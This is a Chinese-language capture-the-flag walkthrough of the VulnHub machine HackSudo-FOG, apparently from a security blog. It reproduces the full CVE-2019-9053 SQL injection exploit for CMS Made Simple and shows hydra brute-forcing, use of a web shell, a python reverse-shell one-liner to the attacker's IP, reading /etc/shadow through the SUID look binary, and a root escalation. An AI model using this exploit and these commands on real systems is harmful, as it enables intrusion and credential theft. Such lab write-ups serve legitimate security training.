渗透测试No.23 wave信息隐藏 look命令提权 HackSudo-FOG

扫描公众号关注更多打靶文章

靶机信息

下载地址:

https://www.vulnhub.com/entry/hacksudo-fog,697/

靶场: VulnHub.com

靶机名称: HackSudo-FOG

难度: 简单

发布时间: 2021年5月14日

提示信息: 无

目标: 4个flag

实验环境

攻击机:VMware	kali	192.168.7.3

靶机:Vbox		linux	IP自动获取

信息收集

扫描主机

扫描局域网内的靶机IP地址

sudo nmap -sP 192.168.7.1/24

扫描到主机地址为192.168.7.130

扫描端口

扫描靶机开放的服务端口

sudo nmap -sv -p- 192.168.7.130 -oN fog.nmap

扫描到到多个开放端口21(ftp)、22（ssh）、80（http）、443（http）、2049（RPC）、3306（mysql），先看看80

Web渗透

访问80

http://192.168.7.130

首页上是一段视频，隐藏了一个链接"index1.html",访问看看

http://192.168.7.130/index1.html

打开后是一张图片，源码里有些注释，提示凯撒密码和一个github的链接

https://github.com/hacksudo/SoundStegno

打开仓库后是一个把信息隐藏到wave文件中的工具这里有两个py文件，SoundStegno.py把信息隐藏到wave中，ExWave.py是从wave中将隐藏信息提取出来

目录扫描

gobuster dir -u http://192.168.7.130 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,zip

扫描到2个目录和1个文本文件，先把他下载下来查看内容

wget http://192.168.7.130/dict.txt
cat dict.txt

看起来是个密码字典，也许可以暴破SSH或FTP，现在没有帐号，去看下fog目录，这个目录名和靶机名一样

http://192.168.7.130/fog

里面还有个fog目录

空的，再去看下cms目录

标题已经给出了这是cms made simple去找找有什么漏洞

https://www.exploit-db.com/

漏洞还挺多，先确认下靶机上cms是什么版本,继续目录扫描

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.7.130/cms -x php,html,txt

这里有个doc目录，继续扫描

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.7.130/cms/doc -x php,html,txt

扫描后发现CHANGELOG.txt文件，访问查看cms版本

http://192.168.7.130/cms/doc/CHANGELOG.txt

确认版本是2.2.5可以找相应的exp了

这里有一个小于2.2.10版本存在sql注入，下载这个试试

exp.py

#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053

import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)

options, args = parser.parse_args()
if not options.url:
    print "[+] Specify an url target"
    print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
    print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
    print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
    exit()

url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
temp_password = ""
TIME = 1
db_name = ""
output = ""
email = ""

salt = ''
wordlist = ""
if options.wordlist:
    wordlist += options.wordlist

def crack_password():
    global password
    global output
    global wordlist
    global salt
    dict = open(wordlist)
    for line in dict.readlines():
        line = line.replace("\n", "")
        beautify_print_try(line)
        if hashlib.md5(str(salt) + line).hexdigest() == password:
            output += "\n[+] Password cracked: " + line
            break
    dict.close()

def beautify_print_try(value):
    global output
    print "\033c"
    cprint(output,'green', attrs=['bold'])
    cprint('[*] Try: ' + value, 'red', attrs=['bold'])

def beautify_print():
    global output
    print "\033c"
    cprint(output,'green', attrs=['bold'])

def dump_salt():
    global flag
    global salt
    global output
    ord_salt = ""
    ord_salt_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_salt = salt + dictionary[i]
            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_salt)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            salt = temp_salt
            ord_salt = ord_salt_temp
    flag = True
    output += '\n[+] Salt for password found: ' + salt

def dump_password():
    global flag
    global password
    global output
    ord_password = ""
    ord_password_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_password = password + dictionary[i]
            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_password)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
            payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            password = temp_password
            ord_password = ord_password_temp
    flag = True
    output += '\n[+] Password found: ' + password

def dump_username():
    global flag
    global db_name
    global output
    ord_db_name = ""
    ord_db_name_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_db_name = db_name + dictionary[i]
            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_db_name)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            db_name = temp_db_name
            ord_db_name = ord_db_name_temp
    output += '\n[+] Username found: ' + db_name
    flag = True

def dump_email():
    global flag
    global email
    global output
    ord_email = ""
    ord_email_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_email = email + dictionary[i]
            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_email)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            email = temp_email
            ord_email = ord_email_temp
    output += '\n[+] Email found: ' + email
    flag = True

dump_salt()
dump_username()
dump_email()
dump_password()

if options.cracking:
    print colored("[*] Now try to crack password")
    crack_password()

beautify_print()

python2 -m pip install termcolor
python2 exp.py -u http://192.168.7.130/cms

扫到帐号hacksudo密码是加密过的，查了几个网站都没解出来

密码暴破

现在用帐号和之前下载的字典暴破下FTP和SSH看看有什么收获

hydra -l hacksudo -P dict.txt 192.168.7.130 ftp

hydra -l hacksudo -P dict.txt 192.168.7.130 ssh

FTP暴破出密码是hackme,SSH没有收获

访问ftp

ftp hacksudo@192.168.7.130
输入密码hackme

登录成功看下有哪些文件，都下载下来

ls -all
get flag1.txt
cd hacksudo_ISRO_bak

get authors.txt
get installfog
get secr3tSteg.zip
exit
ll

cat flag1.txt
cat authors.txt
cat installfog

没什么有用信息，看下压缩包有什么

unzip secr3tSteg.zip

需要密码，暴破下

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u secr3tSteg.zip

拿到密码就可以解压缩包了

unzip secr3tSteg.zip
输入密码fooled

解出来2个文件，有一个wav文件，联想到之前的wave隐藏信息，先看下secr3t.txt文件是什么再去下载工具

cat secr3t.txt
git clone https://github.com/hacksudo/SoundStegno.git

secr3t.txt文本没看到目前有用的信息，用工具提取wav内隐藏的信息

python3 SoundStegno/ExWave.py -f hacksudoSTEGNO.wav

拿到一串加密的字符串，联想到之前的凯撒密码，我们去解一下

zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR

https://www.dcode.fr/chiffre-cesar

解出来的内容是wwww.localhost/fog Username=fog:password=hacksudoISRO用帐号密码尝试登录后台

http://192.168.7.130/cms/admin/login.php

登录成功，并且在文件管理模块找到一个文件，里面是一句话木马，文件管理中可以将其改名

把后缀改为php，然后反弹个shell

改名失败，那我们拷贝一份

拷贝成功，直接点击访问验证

http://192.168.7.130/cms/uploads/1.php?cmd=id

可以执行命令，开始反弹shell

kali攻击机下监听4444端口

nc -lvvp 4444

执行反弹shell

http://192.168.7.130/cms/uploads/1.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.7.3",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

反弹成功，切换成可交互的shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+z快捷键

stty -a
stty raw -echo;fg
reset

stty rows 21 columns 105

切换完成，找找可以提权的东西

/var/www目录下找到第2个flag

cat flag2.txt

sudo -l 需要密码，suid有收获

find / -perm -u=s -type f 2>/dev/null

有个look文件，用他读shadow文件

/usr/bin/look '' '/etc/shadow'

暴破shadow密码

这两个帐号是有密码的，保存下来暴破

vi carck.txt

开始暴破

john carck.txt

拿到isro的密码qwerty现在用SSH登录

ssh isro@192.168.7.130
输入密码qwerty

登录成功看看用户目录下有什么

又拿到1个flag，还有一个fog目录

cd fog
ls -all

有一个fog文件有root权限，执行下

./fog

是python2,直接用他提权吧

import os
os.system('/bin/bash')
id

提权成功，去root目录下拿最后的flag

cd /root
ls -all
cat root.txt

拿到root.txt，游戏结束
更多靶机文章请关注微信公众号"伏波路上学安全"或扫描下方二维码